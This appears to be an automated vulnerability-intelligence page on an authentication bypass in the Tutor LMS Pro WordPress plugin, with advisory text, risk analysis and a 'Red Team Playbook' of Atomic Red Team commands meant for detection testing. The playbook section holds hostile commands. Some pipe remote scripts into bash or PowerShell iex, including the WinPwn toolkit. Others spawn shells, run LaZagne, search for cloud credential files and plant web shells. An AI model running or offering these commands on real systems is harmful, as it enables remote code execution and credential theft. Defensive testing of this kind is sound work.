CVE-2026-0953
Overview
This vulnerability is an authentication bypass in the Tutor LMS Pro WordPress plugin, specifically within the Social Login addon. The root cause is the failure to validate that the email address submitted during the authentication request matches the email associated with the validated OAuth token. This flaw affects all versions up to and including 3.9.5 of the Tutor LMS Pro plugin's Social Login component.
Vulnerability Description
The Tutor LMS Pro plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 3.9.5 via the Social Login addon. This is due to the plugin failing to verify that the email provided in the authentication request matches the email from the validated OAuth token. This makes it possible for unauthenticated attackers to log in as any existing user, including administrators, by supplying a valid OAuth token from their own account along with the victim's email address.
Impact
An unauthenticated attacker can log in as any existing user by supplying a valid OAuth token from their own account combined with the victim's email address, enabling full account takeover including administrator accounts. This requires no user interaction and can be performed remotely over the network. The consequence is unauthorized access to sensitive user data and administrative functions, potentially leading to data breaches and full site compromise. The CVSS vector indicates no privileges or user interaction are needed (AV:N/AC:L/PR:N/UI:N).
Solution
Users should upgrade Tutor LMS Pro to version 3.9.6 or later, where the vendor has corrected the OAuth token verification process. The official advisory available at https://tutorlms.com/releases/id/393/ provides patch details and update instructions. No alternative workarounds are specified; applying the vendor-supplied update is required to remediate this issue.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability present in the Tutor LMS Pro plugin for WordPress is characterized by an authentication bypass flaw that arises from improper validation of OAuth tokens during the login process. Specifically, the plugin fails to ensure that the email address provided in the authentication request corresponds to the email associated with the validated OAuth token. This oversight allows an attacker to exploit the system by using a valid OAuth token from their own account while specifying the email address of any existing user, including those with administrative privileges. The failure to enforce this critical check effectively opens the door for unauthorized access to user accounts, undermining the integrity of the authentication mechanism.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could initiate the process by obtaining a valid OAuth token from a legitimate service provider, such as Google or Facebook, which is commonly used for social logins. Once the attacker has this token, they would simply need to input the email address of the target user during the login attempt. Given that the plugin does not verify the association between the token and the email, the attacker could successfully log in as the victim, gaining access to their account and potentially escalating privileges if the victim is an administrator. This scenario highlights the ease with which an attacker can exploit the flaw, as it requires minimal technical skill and no direct interaction with the victim.
The real-world implications of this vulnerability are significant, particularly for organizations that rely on the Tutor LMS Pro plugin for managing online learning environments. An attacker gaining administrative access could manipulate course content, access sensitive user data, and disrupt services, leading to potential data breaches and loss of user trust. Furthermore, the business risks extend beyond immediate financial losses; reputational damage could result from public exposure of the breach, leading to long-term impacts on customer relationships and brand integrity. The severity of this vulnerability, underscored by its high CVSS score, necessitates urgent attention from organizations utilizing the affected plugin.
To effectively detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First, it is crucial to update the Tutor LMS Pro plugin to the latest version, where the vulnerability has been addressed. Regularly monitoring plugin updates and applying security patches promptly can significantly reduce exposure to known vulnerabilities. Additionally, organizations should conduct routine security assessments and penetration testing to identify and remediate potential weaknesses in their systems. Employing web application firewalls (WAFs) can also help in detecting and blocking malicious login attempts that exploit this authentication bypass flaw. Finally, educating users about the importance of strong, unique passwords and enabling two-factor authentication can further enhance security and reduce the risk of unauthorized access.
In conclusion, the authentication bypass vulnerability in the Tutor LMS Pro plugin represents a critical risk for organizations leveraging this tool for online education. The ease of exploitation, coupled with the potential for severe consequences, underscores the need for immediate action to secure affected systems. By adopting proactive detection and mitigation strategies, organizations can safeguard their digital environments against such vulnerabilities, ensuring the protection of user data and maintaining the trust of their stakeholders.
CSURFACE threat intelligence has identified a notable increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2026-0953, rising by over 50% in recent assessments. This upward adjustment, despite a concurrent significant reduction in detection activity across our telemetry, suggests a growing potential for exploitation that is not yet fully reflected in observed attack patterns. The stable short-term trend and absence of rapidly increasing exploit attempts indicate that while exploitation remains limited, the vulnerability’s attractiveness to threat actors may be increasing, possibly due to emerging attacker interest or evolving tactics that evade current detection capabilities. For defenders, this divergence between predictive risk metrics and observed exploitation underscores the importance of maintaining vigilance and reassessing detection strategies to account for stealthier or less frequent attack vectors. Consequently, the overall threat level should be considered elevated from previous assessments, reflecting a heightened likelihood of exploitation attempts that could materialize without prominent warning signs in telemetry data.
Affected Products
No CPE information available.
Exploits
No exploits found for this CVE.
Threat Feed
2 eventsSighting activity recorded
Sighting activity recorded
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2026-0953 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/92a120ac-66ae-4678-a87a-e62da885d50b?source=cve |
| tutorlms.com |
GitHub CVE
|
https://tutorlms.com/releases/id/393/ |